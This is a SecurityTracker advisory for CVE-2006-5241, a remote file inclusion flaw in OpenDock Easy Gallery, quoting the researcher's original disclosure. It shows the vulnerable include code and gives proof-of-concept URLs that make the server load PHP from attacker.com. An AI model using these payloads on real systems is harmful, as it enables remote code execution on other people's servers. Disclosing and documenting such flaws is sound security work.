OpenDock Easy Gallery 'doc_directory' Parameter Include File Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1017021 |
|
SecurityTracker URL: http://securitytracker.com/id/1017021
|
|
CVE Reference:
CVE-2006-5241
(Links to External Site)
|
Updated: Jun 2 2008
|
Original Entry Date: Oct 10 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.4 and prior versions
|
Description:
A vulnerability was reported in OpenDock Easy Gallery. A remote user can include and execute arbitrary code on the target system.
The 'file.php' script does not properly validate user-supplied input in the 'doc_directory' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
The following other files are also affected:
sw/lib_user/find_user.php
sw/lib_user/lib_user.php
sw/lib_user/lib_form_user.php
sw/lib_user/user.php
sw/lib_session/find_session.php
sw/lib_session/session.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
Other files not listed above are affected.
Some demonstration exploit URLs are provided:
http://[target]/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://[target]/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://attacker.com/inject.txt?
Dedi Dwianto a.k.a the_day discovered this vulnerability.
The original advisory is available at:
http://advisories.echo.or.id/adv/adv52-theday-2006.txt
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: web.opendock.net/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 9 Oct 2006 05:09:30 -0000
Subject: [ECHO_ADV_52$2006]OpenDock Easy Gallery <=1.4 (doc_directory)
|
ECHO_ADV_52$2006
-----------------------------------------------------------------------------------------------
[ECHO_ADV_52$2006]OpenDock Easy Gallery <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------
Author : Dedi Dwianto a.k.a the_day
Date Found : October, 09th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv52-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : OpenDock Easy Gallery
version : <=1.4
URL : http://web.opendock.net
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
In folder sw/lib_up_file/ I found vulnerability script file.php
--------------------------file.php---------------------------------------
....
<?
include $doc_directory.$path_sw."lib_up_file/lib_file.php";
include $doc_directory.$path_sw."lib_up_file/lib_form_file.php";
include $doc_directory.$path_sw."lib_up_file/lib_read_file.php";
include $doc_directory.$path_sw."lib_up_file/lib_page_file.php";
include $doc_directory.$path_sw."lib_up_file/find_file.php";
include $doc_directory.$path_sw."lib_up_file/down_stat.php";
...
----------------------------------------------------------
Input passed to the "$doc_directory" parameter in file.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Also affected files on Files:
sw/lib_user/find_user.php
sw/lib_user/lib_user.php
sw/lib_user/lib_form_user.php
sw/lib_user/user.php
sw/lib_session/find_session.php
sw/lib_session/session.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
etc..
Proof Of Concept:
~~~~~~~~~~~~~~~
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://attacker.com/inject.txt?
Solution:
~~~~~~~
- Sanitize variable $doc_directory on affected files.
- Turn off register_globals
Timeline:
~~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure
---------------------------------------------------------------------------
Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id
-------------------------------- [ EOF ]----------------------------------
|
|
